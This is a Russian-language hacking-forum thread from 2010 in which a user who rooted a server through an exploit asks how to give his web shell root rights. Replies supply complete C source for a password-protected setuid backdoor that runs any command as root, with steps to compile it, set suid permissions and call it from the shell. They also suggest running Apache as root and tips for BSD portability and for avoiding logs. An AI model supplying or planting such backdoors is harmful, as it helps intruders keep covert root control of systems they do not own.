 |
21.04.2010, 13:37
|
|
Новичок
Регистрация: 22.04.2006
Сообщений: 15
С нами:
10554400
Репутация:
2
|
|
Как сделать root шел?
Вообщем имеется обычный шел, с помощью експлойта получаю рута, но как сделать шел с правами рута не пойму.
Пробовал давать группу и владельца шелу root, результат 0
Что нужно сделать?
|
|
|
21.04.2010, 13:43
|
|
Участник форума
Регистрация: 03.09.2009
Сообщений: 179
С нами:
8782736
Репутация:
90
|
|
нужно сделать прогу с правами рута, через которую твой шел станет рутовым. Где-то тут статья есть.
|
|
|
|
21.04.2010, 13:46
|
|
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
С нами:
9328706
Репутация:
1503
|
|
наипростейший но и палевный способ - сделать суидник - простую программу, которая выполняет посланные в виде аргумента команды, на которую установлены суид-права из под рута (chmod 4***). Есть более надежные способы - типа ссш-протроянивания, но для веб-шелла не подходит.
UPD:
Вот код суидника:
#include <stdio.h>
#include <stdlib.h>
main(int argc, char *argv[])
{
// проверяем количество аргументов
if(argc == 3){
//проверяем наш пароль cool_hack
if(strcmp(argv[1],"cool_hack") == 0){
// Устанавливаем gid(0) r00t
setgid(0);
// Устанавливаем uid(0) r00t
setuid(0);
// Выполняем команды с установленными ранее правами
system(argv[2]);
}
}
return 0;
}
компилишь и устанавливаешь суидные права под рутом, потом с шелла юзаешь, например : "./suid cool_hack id"
UPD2:
изменять права файлу шелла на рутовые не имеет смысла, т.к. php-файл не исполняемый.
__________________
You may say I'm a dreamer
But I'm not the only one
Последний раз редактировалось Twoster; 21.04.2010 в 13:54..
|
|
|
|
21.04.2010, 13:56
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
С нами:
10339586
Репутация:
1396
|
|
Вообщем имеется обычный шел, с помощью експлойта получаю рута, но как сделать шел с правами рута не пойму.
Пробовал давать группу и владельца шелу root, результат 0
Что нужно сделать?
Если имеется ввиду веб-шелл, тогда просто в httpd.conf(или подобном) выставить юзера root вместо apache\www-data и рестартануть апач.
какой вопрос, такой ответ.
Последний раз редактировалось $n@ke; 21.04.2010 в 14:16..
|
|
|
|
21.04.2010, 22:00
|
|
Постоянный
Регистрация: 14.07.2005
Сообщений: 964
С нами:
10960226
Репутация:
1424
|
|
Сообщение от $n@ke
Если имеется ввиду веб-шелл, тогда просто в httpd.conf(или подобном) выставить юзера root вместо apache\www-data и рестартануть апач.
апач не будет работать
|
|
|
|
21.04.2010, 22:25
|
|
Новичок
Регистрация: 11.09.2009
Сообщений: 23
С нами:
8771234
Репутация:
23
|
|
Twoster, не всегда получается, так что нужен рутовый шел в системе линукс. Во FreeBSD, например, права таким образом не поднимутся.
в стиле bsd и, вообще, портабельней будет делать
setresuid(0,0,0);
setresgid(0,0,0);
Таким образом попытается установить реальный, действительный и сохраненый uid и gid в 0.
В журнале "хакер" эта тема достаточно хорошо освещена
http://www.xakep.ru/post/50734
ЗЫ. Не забывай, что пишется лог об установленных suid'никах |
|
|
|
21.04.2010, 22:28
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
В журнале "хакер" эта тема достаточно хорошо освещена
http://www.xakep.ru/post/50734
кхм, ты на автора той статьи в ][ взгляни, там сверху рыженьким нарисовано
|
|
|
|
21.04.2010, 23:50
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
С нами:
10339586
Репутация:
1396
|
|
Сообщение от ShAnKaR
апач не будет работать
я б не стал так категорично..бывали случаи.
|
|
|
|
22.04.2010, 00:37
|
|
Новичок
Регистрация: 11.09.2009
Сообщений: 23
С нами:
8771234
Репутация:
23
|
|
Twoster, сори за невнимательность, не заметил
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
